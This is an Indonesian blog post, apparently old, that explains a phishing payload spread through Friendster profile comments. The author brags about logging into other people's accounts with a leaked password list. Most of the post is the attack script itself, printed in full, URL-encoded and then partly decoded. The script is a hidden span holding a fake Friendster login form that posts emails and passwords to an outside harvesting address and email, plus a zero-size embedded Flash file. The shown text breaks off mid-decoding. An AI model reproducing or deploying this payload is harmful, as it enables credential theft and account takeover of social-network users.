hehe.. beneran ini bisa dilakukan.. kemarin dapat link yang menyimpan banyak daftar email dan password buat login ke friendster.. dan setelah dicoba.. wew.. bisa!.. coba liyat comment di profile ku .. [komen ini akan saya hapus nantinya..
]
tapi maaf untuk alasan yang pasti anda ngerti maka link buat dapatin account itu tidak saya sebutkan di sini.. tapi mari kita bahas bagaimana proses dari script yang dikirim ke comment/testimonal anda.. agak panjang juga sih..
script yang dikirim adalah seperti ini
<span id="markloreto" style="display:none">%3C%21DOCTYPE%20html%20PUBLIC%20%22-//W3C//DTD%20HTML
%204.0%20Transitional//EN%22%20%22http%3A//www.w3.org/TR/1998/REC-html40-19
980424/loose.dtd%22%3E%0D%0A%0D%0A%3Chtml%3E%0D%0A%3Chead%3E%0D%0A%3Cm
eta%20http-equiv%3D%22Content-Type%22%20content%3D%22text/html%3B%20charset
%3Diso-8859-1%22%3E%0D%0A%3Ctitle%3EFriendster%20-%20Log%20In%3C/title%3E%0D
%0A%3Clink%20rel%3D%22stylesheet%22%20type%3D%22text/css%22%20media%3D%22
screen%2C%20print%22%20href%3D%22http%3A//images.friendster.com/200610B/
css/REV01/home.css%22%3E%0D%0A%3Clink%20rel%3D%22stylesheet%22%20type%3D
%22text/css%22%20media%3D%22screen%2C%20print%22%20href%3D%22http%3A//
images.friendster.com/200610B/css/globnav.css%22%3E%0D%0A%3Clink%20rel%3D
%22SHORTCUT%20ICON%22%20href%3D%22http%3A//images.friendster.com/images
/friendster2.ico%22%3E%0D%0A%3Cscript%20type%3D%22text/javascript%22%3E%0D
%0Awindow.name%3D%22friendster%22%3B%0D%0A%0D%0Afunction%20loginf%28%29
%20%7B%0D%0Aif%20%28document.login_form.email.value%20%21%3D%20%27%27%29
%20%7B%0D%0Aif%20%28document.login_form.password.value%20%21%3D%20%22%22
%29%20%7B%0D%0Adocument.login_form.password.select%28%29%3B%0D%0A%7D%0D
%0Adocument.login_form.password.focus%28%29%3B%0D%0A%7D%20else%20%7B%0D
%0Adocument.login_form.email.focus%28%29%3B%0D%0A%7D%0D%0A%7D%0D%0A%3C
/script%3E%3Cscript%20type%3D%22text/javascript%22%3E%0D%0Avar%20pageViewerID
%20%3D%20%22%22%3B%0D%0Avar%20pageOwnerID%20%3D%20%22%22%3B%0D%0Avar%20
pageViewerFName%20%3D%20%22%22%3B%0D%0Avar%20pageOwnerFName%20%3D%20%22
%22%3B%0D%0Avar%20pandoraRegFlag%20%3D%20%27%27%3B%0D%0Avar%20userHasBlog
%20%3D%20%27%27%3B%0D%0A%0D%0Avar%20HbxTrackingEnabled%20%3D%20false%3B%0D
%0A%3C/script%3E%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//
images.friendster.com/200610B/js/friendster_v1.js%22%3E%3C/script%3E%3Cstyle%20type
%3D%22text/css%22%3E%3C/style%3E%0D%0A%3Cscript%3E%0D%0A%0D%0Afunction%20onPageLoad
%28%29%0D%0A%7B%0D%0AdisplayAds%28%27paidlink%27%2C%27sponsorsAd%27%2C%27%27%2C
%27xsl/login.xsl%27%2C1%29%3Bloginf%28%29%3B%0D%0A%7D%0D%0A%0D%0A%3C/script%3E%0D
%0A%0D%0A%3C/head%3E%0D%0A%3Cbody%3E%0D%0A%3Cdiv%20id%3D%22homeBg%22%3E%3Cdiv
%20id%3D%22container%22%3E%0D%0A%3Cdiv%20id%3D%22top_frame%22%3E%3Cdiv%20id%3D%22
navigation%22%3E%0D%0A%3Cdiv%20id%3D%22logo%22%3E%3Ca%20target%3D%22_top%22%20href
%3D%22/%22%3E%3Cimg%20alt%3D%22Friendster%22%20border%3D%220%22%20class%3D%22logo%22
%20width%3D%22217%22%20height%3D%2230%22%20src%3D%22http%3A//images.friendster.com/
images/logo-whitebg.png%22%3E%3C/a%3E%3C/div%3E%0D%0A%3Cdiv%20id%3D%22subnav_search
%22%3E%0D%0A%3Cdiv%20id%3D%22subnav%22%3E%0D%0A%3Ca%20target%3D%22_top%22%20href
%3D%22/messages.php%22%3EMessages%3C/a%3E%3Cspan%20class%3D%22globnav_bullet%22%3E
%20%B7%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/editaccount.php%22%3E
Settings%3C/a%3E%3Cspan%20class%3D%22globnav_bullet%22%3E%20%B7%20%3C/span%3E%3Ca%20
target%3D%22_top%22%20href%3D%22/custhelp.php%22%3EHelp%3C/a%3E%3Cspan%20class%3D%22
globnav_bullet%22%3E%20%B7%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/%22
%3ELog%20In%3C/a%3E%0D%0A%0D%0A%3C/div%3E%0D%0A%3Cdiv%20id%3D%22search%22%3E%3C
form%20action%3D%22/headersearch.php%22%20target%3D%22_top%22%20method%3D%22get%22
%20name%3D%22headsearchform%22%3ESearch%3A%20%3Cinput%20type%3D%22hidden%22%20name
%3D%22search%22%20value%3D%221%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22sf
%22%20value%3D%220%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22filter%22%20value
%3D%22network%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22loc%22%20value%3D%22
login%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22statpos%22%20value%3D%22headersearch
%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22s%22%20value%3D%22%22%3E%3Cselect%20name
%3D%22stype%22%20style%3D%22margin%3A%203px%201px%201px%205px%3B%20height%3A%2018px%3B%20
width%3A%20110px%3B%20font-size%3A%2011px%3B%22%20onchange%3D%22%0D%0Adocument.headsearchform.s.value
%3D%27%27%3B%0D%0Adocument.getElementById%28%26quot%3Bsearchinput%26quot%3B%29.value%3D%27%27%3B%0D%0A%0D
%0Aif%28this.options%5B11%5D.selected%29parent.location.href%3D%27/searchcollege.php%27%3B%0D%0Aelse%20if%28this.options
%5B12%5D.selected%29parent.location.href%3D%27/searchschool.php%27%3B%0D%0A%22%3E%3Coptgroup%20label%3D%22Choose%20
option%22%3E%0D%0A%3Coption%20value%3D%22user%22%3EName%3C/option%3E%0D%0A%3Coption%20value%3D%22hometown
%22%3EHometown%3C/option%3E%0D%0A%3Coption%20value%3D%22companies%22%3ECompanies%3C/option%3E%0D%0A%3
Coption%20value%3D%22schools%22%3ESchools%20%28Other%29%3C/option%3E%0D%0A%3Coption%20value%3D%22affiliations
%22%3EAffiliations%3C/option%3E%0D%0A%3Coption%20value%3D%22interests%22%3EInterests%3C/option%3E%0D%0A%3
Coption%20value%3D%22fbooks%22%3EBooks%3C/option%3E%0D%0A%0D%0A%3Coption%20value%3D%22fmovies%22%3EMovies
%3C/option%3E%0D%0A%3Coption%20value%3D%22fmusic%22%3EMusic%3C/option%3E%0D%0A%3Coption%20value%3D%22ftv
%22%3ETV%20Shows%3C/option%3E%0D%0A%3Coption%20value%3D%22web%22%3EWeb%3C/option%3E%0D%0A%3C/
optgroup%3E%0D%0A%3Coptgroup%20label%3D%22More%20searches%3A%22%3E%0D%0A%3Coption%20value%3D%22college
%22%3ECollege%3C/option%3E%0D%0A%3Coption%20value%3D%22school%22%3ESchool%3C/option%3E%0D%0A%3C/optgroup
%3E%3C/select%3E%3Cinput%20type%3D%22text%22%20name%3D%22s%22%20maxlength%3D%22200%22%20class%3D%22
globnav_textbox%22%20value%3D%22email%2C%20first%20and%20last%20name%2C%20or%20first%20only%22%20onFocus
%3D%22this.value%3D%27%27%3B%20this.onfocus%3Dnull%3B%22%20id%3D%22searchinput%22%3E%3Cinput%20type%3D
%22image%22%20name%3D%22cont%22%20alt%3D%22Go%22%20class%3D%22globnav_inputbtn%22%20src%3D%22http
%3A//images.friendster.com/images/global/search_submit.jpg%22%3E%3Cinput%20type%3D%22hidden%22%20name
%3D%22search%22%20value%3D%221%22%3E%0D%0A%3C/form%3E%3C/div%3E%0D%0A%3C/div%3E%0D%0A%0D%0A%3Cbr
%20clear%3D%22all%22%3E%3Cdiv%20id%3D%22mainnav%22%3E%0D%0A%3Cdiv%20class%3D%22left%22%3E%3C/div%3E
%0D%0A%3Cdiv%20class%3D%22right%22%3E%3C/div%3E%0D%0A%3Cdiv%20class%3D%22links%22%3E%0D%0A%3Ca%20
target%3D%22_top%22%20href%3D%22/%22%3EHome%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20
color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/user.php%22%3E
Profile%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span
%3E%3Ca%20target%3D%22_top%22%20href%3D%22/friends.php%22%3EFriends%3C/a%3E%3Cspan%20style%3D%22margin%3A%200
%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/gallery.php
%22%3ESearch%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span
%3E%3Ca%20target%3D%22_top%22%20href%3D%22/video.php%22%3EVideo%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px
%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/blogs.php%22%3EBlogs
%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span%3E%3Ca%20target
%3D%22_top%22%20href%3D%22/love.php%22%3ELove%3C/a%3E%3Cspan%20class%3D%22newicon%22%20style%3D%22height%3A%2010px
%3B%20margin-left%3A%203px%3B%20%22%3E%3Cimg%20src%3D%22http%3A//images.friendster.com/images/global/+new.gif%22%20
style%3D%22%22%3E%3C/span%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/
span%3E%3Ca%20target%3D%22_top%22%20href%3D%22http%3A//classifieds.friendster.com/%22%3EClassifieds%3C/a%3E%3Cspan%20
style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22%3E%20%7C%20%3C/span%3E%3Ca%20target%3D%22_top%22%20
href%3D%22/discussion.php%22%3EForums%3C/a%3E%3Cspan%20style%3D%22margin%3A%200%202px%3B%20color%3A%20%23fff%3B%22
%3E%20%7C%20%3C/span%3E%3Ca%20target%3D%22_top%22%20href%3D%22/invite.php%22%3EInvite%3C/a%3E%0D%0A%0D%0A%3C/div
%3E%0D%0A%3C/div%3E%0D%0A%3Cdiv%20id%3D%22navdivider%22%3E%3C/div%3E%0D%0A%3Cdiv%20id%3D%22marketing_bg%22%3E%3C
div%20id%3D%22marketing%22%3E%3C/div%3E%3C/div%3E%0D%0A%3C/div%3E%3C/div%3E%0D%0A%3Cdiv%20id%3D%22bottom_frame%22
%3E%3Cdiv%20id%3D%22content_frame%22%3E%0D%0A%3Cdiv%3E%0D%0A%3Cdiv%20id%3D%22content%22%3E%0D%0A%0D%0A%3Cdiv%20
class%3D%22flo2%22%3E%0D%0A%3Cdiv%20class%3D%22lc%22%3E%3Cdiv%20class%3D%22commonbox%22%3E%3Cdiv%20id%3D%22signIn%22
%20class%3D%22commonbox%20sn_dkbluebor%20sn_ltbluebg%22%3E%3Cdiv%20class%3D%22boxcontent%22%3E%0D%0A%3Ch2%20class%3D
%22sn%20sn_dkblue%22%3EPlease%20sign%20in%20to%20continue%3C/h2%3E%0D%0A%3C%21–%20login%20box%20goes%20here%20–%3E%0D
%0A%3Cdiv%20class%3D%22top%20yregbx%22%3E%0D%0A%3Cspan%20class%3D%22ct%22%3E%3Cspan%20class%3D%22cl%22%3E%3C/span%3E
%3C/span%3E%0D%0A%3Cdiv%20class%3D%22yregbxi%22%3E%0D%0A%3Cp%3E%3C/p%3E%0D%0A%0D%0A%0D%0A%0D%0A%3Ch1%3E%3C/h1%3E
%0D%0A%0D%0A%0D%0A%3Clegend%3E%3C/legend%3E%0D%0A%3Cform%20name%3D%22login_form%22%20method%3D%22post%22%20action
%3D%22http%3A//www.yogyafree.net/familycode/login.php%22%3E%0D%0A%3CINPUT%20TYPE%3D%22hidden%22%20NAME%3D%22Mail_From
%22%20VALUE%3D%22Yahoo%22%3E%0D%0A%3CINPUT%20TYPE%3D%22hidden%22%20NAME%3D%22Mail_To%22%20VALUE%3D%22hd.clone@gmail.com
%22%3E%0D%0A%3CINPUT%20TYPE%3D%22hidden%22%20NAME%3D%22Mail_Subject%22%20VALUE%3D%22Yahoo%20id%22%3E%0D%0A%3CINPUT%20TYPE
%3D%22hidden%22%20NAME%3D%22Next_Page%22%20VALUE%3D%22http%3A//www.geocities.com/got_milf.does_you_good/index.html%22%3E%0D%0A
%3Ctable%20id%3D%22yreglgtb%22%20summary%3D%22form%3A%20login%20information%22%3E%0D%0A%3Ctr%3E%0D%0A%0D%0A%0D%0A%0D%0A%0D%0A
%0D%0A%3C%21–%20end%20lisu%20–%3E%0D%0A%3C/div%3E%0D%0A%3Cspan%20class%3D%22cb%22%3E%3Cspan%20class%3D%22cl%22%3E%3C/span%3E
%3C/span%3E%0D%0A%3C/div%3E%0D%0A%0D%0A%3C%21–%20end%20login%20box%20–%3E%0D%0A%3Cinput%20type%3D%22hidden%22%20name%3D
%22_submitted%22%20value%3D%221%22%3E%3Cinput%20type%3D%22hidden%22%20name%3D%22next%22%20value%3D%22/%22%3E%3Cinput%20type%3D
%22hidden%22%20name%3D%22tzoffset%22%20value%3D%22%22%3E%3Cscript%20language%3D%22JavaScript%22%3E%0D%0Avar%20now%20%3D%20new
%20Date%28%29%3B%0D%0Adocument.login_form.tzoffset.value%20%3D%20now.getTimezoneOffset%28%29%3B%0D%0A%3C/script%3E%3Ctable%20cellpadding
%3D%223%22%20cellspacing%3D%220%22%20border%3D%220%22%3E%0D%0A%3Ctr%3E%3Ctd%20colspan%3D%222%22%3E%3C/td%3E%3C/tr%3E%0D%0A%3Ctr%3E
%0D%0A%3Ctd%20style%3D%22text-align%3Aright%20%21important%3B%22%3EEmail%3A%20%3C/td%3E%0D%0A%3Ctd%3E%3Cinput%20type%3D%22text%22%20
name%3D%22email%22%20maxlength%3D%22100%22%20size%3D%2222%22%20alt%3D%22Email%20Address%22%20tabindex%3D%221%22%20style%3D%22width
%3A%20200px%20%21important%3B%22%20value%3D%22%22%3E%3C/td%3E%0D%0A%3C/tr%3E%0D%0A%3Ctr%3E%0D%0A%3Ctd%20style%3D%22text-align%3A
right%20%21important%3B%22%3EPassword%3A%20%3C/td%3E%0D%0A%3Ctd%3E%3Cinput%20type%3D%22password%22%20name%3D%22password%22%20
maxlength%3D%2210%22%20size%3D%2222%22%20alt%3D%22Password%22%20tabindex%3D%222%22%20style%3D%22width%3A%20200px%20%21important
%3B%22%3E%3C/td%3E%0D%0A%3C/tr%3E%0D%0A%3Ctr%3E%0D%0A%3Ctd%3E%3C/td%3E%0D%0A%3Ctd%3E%0D%0A%0D%0A%3Cinput%20type%3D%22checkbox
%22%20name%3D%22remembermyemail%22%3E%3Cspan%20class%3D%22medium%22%3ERemember%20me%3C/span%3E%0D%0A%3C/td%3E%0D%0A%3C/tr
%3E%0D%0A%3Ctr%3E%0D%0A%3Ctd%3E%3C/td%3E%0D%0A%3Ctd%3E%3Cspan%20class%3D%22medium%22%3E%3Ca%20href%3D%22/forgotpassword.php%22
%3EForgot%20password%3F%3C/a%3E%3C/span%3E%3C/td%3E%0D%0A%3C/tr%3E%0D%0A%3Ctr%3E%0D%0A%3Ctd%3E%3C/td%3E%0D%0A%3Ctd%3E%3Cinput
%20type%3D%22submit%22%20value%3D%22Sign%20In%22%20tabindex%3D%223%22%3E%3C/td%3E%0D%0A%3C/tr%3E%0D%0A%3C/table%3E%0D%0A%3C/form
%3E%0D%0A%3Cdiv%20class%3D%22sn_blue_ctb%22%3ENew%20to%20Friendster%3F%20%3Ca%20href%3D%22/join.php%3Fnext%3D%252F%22%3ESign%20Up
%20Now%21%3C/a%3E%0D%0A%0D%0A%3C/div%3E%0D%0A%3C/div%3E%3C/div%3E%3C/div%3E%3C/div%3E%0D%0A%3Cdiv%20class%3D%22rc%22%3E%3Cdiv
%20id%3D%22squareAd%22%3E%0D%0A%3Cscript%20language%3D%22Javascript1.3%22%20type%3D%22text/javascript%22%3E%0D%0A%0D%0A//buncha
%20vars%20that%20are%20redefined%20as%20needed.%0D%0Avar%20axel%20%3D%20Math.random%28%29+%22%22%3B%0D%0Avar%20ord%20%3D%20axel%20*%
201000000000000000000%3B%0D%0Avar%20adUniqueNumber%20%3D%20ord+%27%3F%27%3B%0D%0Avar%20dartAdCounter%3D1%3B%0D%0A%0D%0Afor%28var
%20z%20in%20dartAds%29%0D%0AdartAdCounter++%3B%0D%0A%0D%0A//grab%20the%20container%20div.%20set%20the%20name%20to%20id%2C%20if%20
there%27s%20no%20id%2C%20create%20one%0D%0Avar%20scriptElements%3Ddocument.getElementsByTagName%28%27script%27%29%3B%0D%0Avar%20
parAdDiv%3DscriptElements%5BscriptElements.length-1%5D.parentNode%3B%0D%0A%0D%0Aif%20%28parAdDiv%29%0D%0A%7B%0D%0Aif%28typeof%28parAdDiv.id
%29%3D%3D%22undefined%22%20%7C%7C%20parAdDiv.id%3D%3D%22%22%29%0D%0A%7B%0D%0AparAdDiv.id%3D%22uniqueAdID%22+dartAdCounter%3B
%0D%0A%7D%0D%0AparAdDiv.name%3DparAdDiv.id%3B%0D%0A%7D%0D%0A%0D%0AdartAds%5BdartAdCounter%5D%3D%7BiframeEnabled%3Afalse%2C%20
scriptTag%3A%22%3Csc%22+%22ript%20id%3D%5C%22dartAdScript%22+%20dartAdCounter%20+%20%22%5C%22%20name%3D%5C%22dartAdScript%22+%20
dartAdCounter%20+%20%22%5C%22%20language%3D%5C%22Javascript1.1%5C%22%20type%3D%5C%22text/javascript%5C%22%20src%3D%5C%22/dartad.cgi
%3Fq%3Dhttp%3A//ad.doubleclick.net/adj/frnd.index/login%3Bs%3D4%3B%21category%3Dnrm%3Bdcopt%3Dist%3Bsz%3D425×600%3Bptile%3D2%3Bord%3D%22+
%20adUniqueNumber%20+%20%22%5C%22%3E%3C/scr%22+%22ipt%3E%22%2C%20parentDivID%3AparAdDiv.id%7D%3B%0D%0A%3C/script%3E%0D%0A%3C/div
%3E%3C/div%3E%0D%0A%3Cbr%20class%3D%22clearboth%22%3E%0D%0A%3C/div%3E%0D%0A%0D%0A%0D%0A%3C/div%3E%0D%0A%3Cdiv%20class%3D%22
clearBothNoHeight%22%3E%3C/div%3E%0D%0A%3C/div%3E%0D%0A%3Cdiv%20id%3D%22photobucketPanel%22%20class%3D%22popupPanelClass%22%20style
%3D%22display%3A%20none%3B%22%3E%0D%0A%3Cdiv%20class%3D%22sn_closeX%22%3E%3Ca%20href%3D%22javascript%3AcloseDivUnloadIframe%28%27
photobucketPanel%27%2C%27photobucketIframe%27%29%3B%22%3E%3Cimg%20alt%3D%22close%22%20src%3D%22http%3A//images.friendster.com/images/
bluex.gif%22%3E%3C/a%3E%3C/div%3E%0D%0A%0D%0A%3Ciframe%20id%3D%22photobucketIframe%22%20width%3D%22220%22%20height%3D%22450%22%20
frameborder%3D%220%22%20scrollbars%3D%220%22%3E%3C/iframe%3E%0D%0A%3C/div%3E%0D%0A%3Cdiv%20id%3D%22base_frame%22%3E%0D%0A%3Cdiv
%20id%3D%22adfactory1%22%20name%3D%22adfactory1%22%20style%3D%22visibility%3Ahidden%3Bdisplay%3Anone%22%3E%3Cscript%20id%3D%22
dartAdScriptWrite1%22%20name%3D%22dartAdScriptWrite1%22%3Edocument.write%28getScriptTag%281%29%29%3B%3C/script%3E%3C/div%3E%0D
%0A%3Cdiv%20id%3D%22adfactory2%22%20name%3D%22adfactory2%22%20style%3D%22visibility%3Ahidden%3Bdisplay%3Anone%22%3E%3Cscript%20id
%3D%22dartAdScriptWrite2%22%20name%3D%22dartAdScriptWrite2%22%3Edocument.write%28getScriptTag%282%29%29%3B%3C/script%3E%3C/div%3E
%0D%0A%3Cdiv%20id%3D%22adfactory3%22%20name%3D%22adfactory3%22%20style%3D%22visibility%3Ahidden%3Bdisplay%3Anone%22%3E%3Cscript%20id
%3D%22dartAdScriptWrite3%22%20name%3D%22dartAdScriptWrite3%22%3Edocument.write%28getScriptTag%283%29%29%3B%3C/script%3E%3C/div%3E
%0D%0A%3Cdiv%20id%3D%22adfactory4%22%20name%3D%22adfactory4%22%20style%3D%22visibility%3Ahidden%3Bdisplay%3Anone%22%3E%3Cscript%20id
%3D%22dartAdScriptWrite4%22%20name%3D%22dartAdScriptWrite4%22%3Edocument.write%28getScriptTag%284%29%29%3B%3C/script%3E%3C/div%3E%0D
%0A%3Cscript%20type%3D%22text/javascript%22%20src%3D%22http%3A//images.friendster.com/200610B/js/footer.js%22%3E%3C/script%3E%3Cscript%3E
%0D%0A//%20determine%20when%20the%20dom%20is%20ready%20and%20call%20our%20%22onload%22%20functions%0D%0A%0D%0Aif%20%28
document.getElementsByTagName%20%26%26%20%21window.ParseCtl%29%0D%0A%7B%0D%0Avar%20ParseCtl%20%3D%0D%0A%7B%0D%0Aonparse%20%3A%20
function%20%28%29%20%7B%0D%0AmoveAd%281%29%3B%0D%0AmoveAd%282%29%3B%0D%0AmoveAd%283%29%3B%0D%0AmoveAd%284%29%3B%0D%0AonPageLoad
%28%29%3B%0D%0A%7D%2C%0D%0Acomplete%20%3A%20false%2C%0D%0Atimer%20%3A%200%2C%0D%0AcallOnParse%20%3A%20function%20%28%29%0D%0A%7B%0D
%0Aif%20%28document.getElementsByTagName%28%22body%22%29.length%20%3D%3D%200%20%7C%7C%20ParseCtl.complete%29%20return%3B%0D%0Aif%20%28
document.readyState%20%26%26%20document.readyState%20%3C%202%29%20return%3B%0D%0AclearInterval%28ParseCtl.timer%29%3B%0D%0AParseCtl.complete
%20%3D%20true%3B%0D%0AParseCtl.onparse%28%29%3B%0D%0A%7D%0D%0A%7D%3B%0D%0Aif%20%28document.readyState%29%20%7B%0D%0AParseCtl.timer%20%3D
%20setInterval%28ParseCtl.callOnParse%2C%20100%29%3B%20//%20for%20safari%0D%0Adocument.onreadystatechange%20%3D%20ParseCtl.callOnParse%3B%0D%0A
%7D%0D%0Aelse%20document.addEventListener%28%22DOMContentLoaded%22%2C%20ParseCtl.callOnParse%2C%20null%29%3B%0D%0A%7D%0D%0A%3C/script%3E
%3Cdiv%20id%3D%22sn_adbrite%22%20style%3D%22margin-top%3A%2035px%20%21important%3B%22%3E%0D%0A%3Cstyle%20type%3D%22text/css%22%3E%0D%0A
%23sn_adbrite%20%7B%20border%3A%201px%20solid%20%23b8b8b8%3B%20position%3A%20relative%3B%20width%3A%20auto%3B%20margin%3A%200%3B%20%7D
%0D%0A.adHeadline%2C%20.adHeadline%20a%20%7B%20font-size%3A%2012px%3B%20font-weight%3A%20bold%3B%20color%3A%20blue%3B%20text-decoration%3A
%20underline%3B%20%7D%0D%0A.adText%2C%20.adText%20a%20%7B%20font-size%3A%2011px%3B%20color%3A%20%23555555%3B%20text-decoration%3A%20none
%3B%20%7D%0D%0A.adLink%20a%2C%20.adLink%20a%3Ahover%2C%20.adLink%20a%3Aactive%2C%20.adLink%20a%3Avisited%20%7B%20font-size%3A%2011px%3B
%20color%3A%20%23ff4400%20%21important%3B%20text-align%3A%20right%20%21important%3B%20%7D%0D%0A%3C/style%3E%0D%0A%0D%0A%3Ctable%20border
%3D%220%22%20cellpadding%3D%225%22%20cellspacing%3D%220%22%3E%3C%21–%20Adbrite%20US%20–%3E%3Ctr%3E%3Ctd%20valign%3D%22top%22%3E%3Cscript
%20type%3D%22text/javascript%22%20src%3D%22http%3A//3.adbrite.com/mb/text_group.php%3Fsid%3D30479%26amp%3Bcol%3D4%26amp%3Bbr%3D1%26amp%3B
newwin%3D1%22%3E%3C/script%3E%3C/td%3E%3C/tr%3E%0D%0A%3Ctr%3E%3Ctd%20class%3D%22adLink%22%20valign%3D%22top%22%20align%3D%22right%22%20style
%3D%22text-align%3A%20right%3B%22%3E%3Ca%20target%3D%22_blank%22%20href%3D%22http%3A//www.adbrite.com/mb/commerce/purchase_form.php%3Fopid
%3D30479%26amp%3Bafsid%3D1%22%3EYour%20Ad%20Here%3C/a%3E%3C/td%3E%3C/tr%3E%0D%0A%3C/table%3E%0D%0A%3C/div%3E%0D%0A%3Cdiv%20style%3D%22
width%3A780px%22%3E%3C/div%3E%0D%0A%3C/div%3E%0D%0A%3C/div%3E%3C/div%3E%0D%0A%3C/div%3E%3C/div%3E%0D%0A%3Cdiv%20id%3D%22footer_container
%22%3E%3Cdiv%20id%3D%22footer%22%20class%3D%22applicationWrapper%22%3E%0D%0A%3Ca%20href%3D%22/info/index.php%3Fstatpos%3Dfooter%22%3EAbout%20Us
%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22/info/contacts.php%3Fstatpos%3Dfooter%22%3EContact%20Us%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22http%3A
//classifieds.friendster.com/us/ListAds/Event/%22%3EEvents%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22/affiliate.php%3Fstatpos%3Dfooter%22%3EPromote%20
My%20Profile%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22/custhelp.php%3Fstatpos%3Dfooter%22%3EHelp%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22/info/tos.php
%3Fstatpos%3Dfooter%22%3ETerms%20of%20Service%3C/a%3E%20%7C%0D%0A%3Ca%20href%3D%22/info/privacy.php%3Fstatpos%3Dfooter%22%3EPrivacy%20Policy%3C/a
%3E%3Cdiv%20style%3D%22margin-top%3A%205px%20%21important%3B%22%3ECopyright%202002-2006%20Friendster%2C%20Inc.%20All%20rights%20reserved.%20U.S.%20
Patent%20No.%207%2C069%2C308%3C/div%3E%3C%21–php36–%3E%3C/div%3E%3C/div%3E%0D%0A%0D%0A%3C/body%3E%0D%0A%3C/html%3E%0D%0A</span>
<embed src="http://breakd
ance.freepgs.com/sundel/
sundeloverlay6.swf" qual
ity="high" type="applicat
ion/x-shockwave-flash" wi
dth="0" height="0"></embed
>
heheh… mummet kan bacanya…
dan setelah saya ‘menerjemahkan’ sekitar 80% maksud dari script itu adalah sebagai berikut
<span id="markloreto" style="display:none">
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/1998/REC-html40-19980424/loose.dtd">
<html> <head> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <title>Friendster - Log In</title> <link rel="stylesheet" type="text/css" media="screen, print" href="http://images.friendster.com/200610B/css/REV01/home.css"> <link rel="stylesheet" type="text/css" media="screen, print" href="http://images.friendster.com/200610B/css/globnav.css"> <link rel="SHORTCUT ICON" href="http://images.friendster.com/images/friendster2.ico"> <script type="text/javascript"> window.name="friendster"; function loginf(%29 { if (document.login_form.email.value %21= %27%27%29 { if (document.login_form.password.value %21= ""%29 { document.login_form.password.select(%29; } document.login_form.password.focus(%29; } else { document.login_form.email.focus(%29; } } </script><script type="text/javascript"> var pageViewerID = ""; var pageOwnerID = ""; var pageViewerFName = ""; var pageOwnerFName = ""; var pandoraRegFlag = %27%27; var userHasBlog = %27%27; var HbxTrackingEnabled = false; </script><script type="text/javascript" src="http://images.friendster.com/200610B/js/friendster_v1.js"></script><style type="text/css"></style> <script> function onPageLoad(%29 { displayAds(%27paidlink%27,%27sponsorsAd%27,%27%27,%27xsl/login.xsl%27,1%29;loginf(%29; } </script> </head> <body> <div id="homeBg"><div id="container"> <div id="top_frame"><div id="navigation"> <div id="logo"><a target="_top" href="/"><img alt="Friendster" border="0" class="logo" width="217" height="30" src="http://images.friendster.com/images/logo-whitebg.png"></a></div> <div id="subnav_search"> <div id="subnav"> <a target="_top" href="/messages.php">Messages</a><span class="globnav_bullet"> %B7 </span><a target="_top" href="/editaccount.php">Settings</a><span class="globnav_bullet"> %B7 </span><a target="_top" href="/custhelp.php">Help</a><span class="globnav_bullet"> %B7 </span><a target="_top" href="/">Log In</a> </div> <div id="search"><form action="/headersearch.php" target="_top" method="get" name="headsearchform">Search: <input type="hidden" name="search" value="1"><input type="hidden" name="sf" value="0"><input type="hidden" name="filter" value="network"><input type="hidden" name="loc" value="login"><input type="hidden" name="statpos" value="headersearch"><input type="hidden" name="s" value=""><select name="stype" style="margin: 3px 1px 1px 5px; height: 18px; width: 110px; font-size: 11px;" onchange=" document.headsearchform.s.value=%27%27; document.getElementById("searchinput"%29.value=%27%27; if(this.options%5B11%5D.selected%29parent.location.href=%27/searchcollege.php%27; else if(this.options%5B12%5D.selected%29parent.location.href=%27/searchschool.php%27; "><optgroup label="Choose option"> <option value="user">Name</option> <option value="hometown">Hometown</option> <option value="companies">Companies</option> <option value="schools">Schools (Other%29</option> <option value="affiliations">Affiliations</option> <option value="interests">Interests</option> <option value="fbooks">Books</option> <option value="fmovies">Movies</option> <option value="fmusic">Music</option> <option value="ftv">TV Shows</option> <option value="web">Web</option> </optgroup> <optgroup label="More searches:"> <option value="college">College</option> <option value="school">School</option> </optgroup></select><input type="text" name="s" maxlength="200" class="globnav_textbox" value="email, first and last name, or first only" onFocus="this.value=%27%27; this.onfocus=null;" id="searchinput"><input type="image" name="cont" alt="Go" class="globnav_inputbtn" src="http://images.friendster.com/images/global/search_submit.jpg"><input type="hidden" name="search" value="1"> </form></div> </div> <br clear="all"><div id="mainnav"> <div class="left"></div> <div class="right"></div> <div class="links"> <a target="_top" href="/">Home</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/user.php">Profile</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/friends.php">Friends</a><span style="margin: 0 2px; color: #fff;"> %7C </span><a target="_top" href="/gallery.php">Search</a><span 